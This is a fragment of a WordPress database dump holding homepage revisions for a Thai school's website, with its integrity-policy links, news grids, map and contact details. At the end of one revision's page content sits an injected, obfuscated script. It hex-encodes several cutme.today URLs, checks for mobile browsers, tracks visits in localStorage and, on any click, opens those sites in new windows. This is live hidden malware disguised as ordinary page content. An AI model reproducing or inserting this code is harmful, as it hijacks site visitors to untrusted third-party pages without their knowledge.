{\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-02 14:49:06','2024-08-02 07:49:06','',14,'http://pakhaeng.ssk.in.th/?p=499',0,'revision','',0),
(500,1,'2024-08-02 15:34:04','2024-08-02 08:34:04','','No gift','','inherit','','closed','','no-gift','','','2024-08-02 15:34:04','2024-08-02 08:34:04','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/No-gift.png',0,'attachment','image/png',0),
(502,1,'2024-08-02 15:34:58','2024-08-02 08:34:58','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b